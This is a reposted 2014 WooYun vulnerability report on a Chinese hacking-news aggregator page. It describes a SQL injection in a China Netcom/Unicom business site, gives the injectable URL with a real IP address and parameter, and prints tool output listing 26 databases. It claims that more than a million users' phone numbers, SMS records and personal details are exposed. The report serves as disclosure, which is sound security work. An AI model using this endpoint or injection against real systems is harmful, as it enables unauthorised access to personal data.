记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华
«某业务支撑系统命令执行威胁电信大部分核心业务...
药房任意查看他人订单... »

中国网通旗下业务高危SQL注射跨库百万数据告急

2014-11-26 23:10

中国网通旗下业务高危SQL注射跨库,百万数据告急

漏洞证明:

注射地址:



code 区域
http://61.156.3.61/xiangqing.jsp?sm_no=127744





包含26个数据库,还有HR 。。。。 各种数据库,包括跨库,涉及超过20多个平台。



code 区域
available databases [26]:

[*] CTXSYS

[*] HR

[*] MDSYS

[*] MSGLLF

[*] ODM

[*] ODM_MTR

[*] OE

[*] OLAPSYS

[*] ORDSYS

[*] OUTLN

[*] PM

[*] QS

[*] QS_CBADM

[*] QS_CS

[*] QS_ES

[*] QS_OS

[*] QS_WS

[*] RMAN

[*] SCOTT

[*] SH

[*] SYS

[*] SYSTEM

[*] UNICOMLLF

[*] WKSYS





某个表就36W的数据了,还有其他,总共超过百万的数据泄露



用户电话、短信、私人信息等,包括其他平台的跨库



aa.jpg





bb.jpg





列路径



cc.jpg

修复方案:

过滤


知识来源: www.wooyun.org/bugs/wooyun-2014-079089

阅读:141439 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“中国网通旗下业务高危SQL注射跨库百万数据告急”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

随机推荐 🤖

标签云 ☁